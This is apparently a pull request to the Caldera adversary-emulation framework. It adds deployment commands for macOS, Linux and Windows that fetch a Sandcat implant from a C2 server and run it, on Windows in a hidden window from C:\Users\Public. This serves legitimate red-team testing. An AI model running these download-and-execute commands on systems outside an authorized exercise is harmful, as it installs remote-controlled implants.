### PR TITLE
Add agent extensions via deployment GUI

### DIFF
--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -26,6 +26,12 @@
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
+          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -v
           - description: Download with GIST C2
             command: |
               server="#{app.contact.http}";
@@ -56,6 +62,12 @@
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
+          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -group red -v
           - description: Download with GIST C2
             command: |
               server="#{app.contact.http}";
@@ -90,6 +102,20 @@
               $wc=New-Object System.Net.WebClient;
               $wc.Headers.add("platform","windows");
               $wc.Headers.add("file","sandcat.go");
+              $data=$wc.DownloadData($url);
+              $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
+              get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;
+              rm -force "C:\Users\Public\$name.exe" -ea ignore;
+              [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group blue" -WindowStyle hidden;
+          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+            command: |
+              $server="#{app.contact.http}";
+              $url="$server/file/download";
+              $wc=New-Object System.Net.WebClient;
+              $wc.Headers.add("platform","windows");
+              $wc.Headers.add("file","sandcat.go");
+              $wc.Headers.add("gocat-extensions", "#{agent.extensions}");
               $data=$wc.DownloadData($url);
               $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
               get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -26,7 +26,7 @@
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
-          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
@@ -62,7 +62,7 @@
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
-          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
@@ -108,7 +108,7 @@
               rm -force "C:\Users\Public\$name.exe" -ea ignore;
               [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
               Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group blue" -WindowStyle hidden;
-          - description: Compile agent with a comma-separated list of extension modules (requires GoLang to be installed on the C2 server machine).
+          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               $server="#{app.contact.http}";
               $url="$server/file/download";
@@ -121,7 +121,7 @@
               get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;
               rm -force "C:\Users\Public\$name.exe" -ea ignore;
               [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
-              Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group blue" -WindowStyle hidden;
+              Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
           - description: Deploy as a P2P agent with known peers included in compiled agent
             command: |
               $server="#{app.contact.http}";


### PR DESCRIPTION
## Description
Add deployment command variants to allow users to specify a comma-separated list of agent extensions to include. Requires https://github.com/mitre/caldera/pull/2508 

## Type of change
- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?
Tested deploying agents on all 3 operating systems with and without extensions


## Checklist:
- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
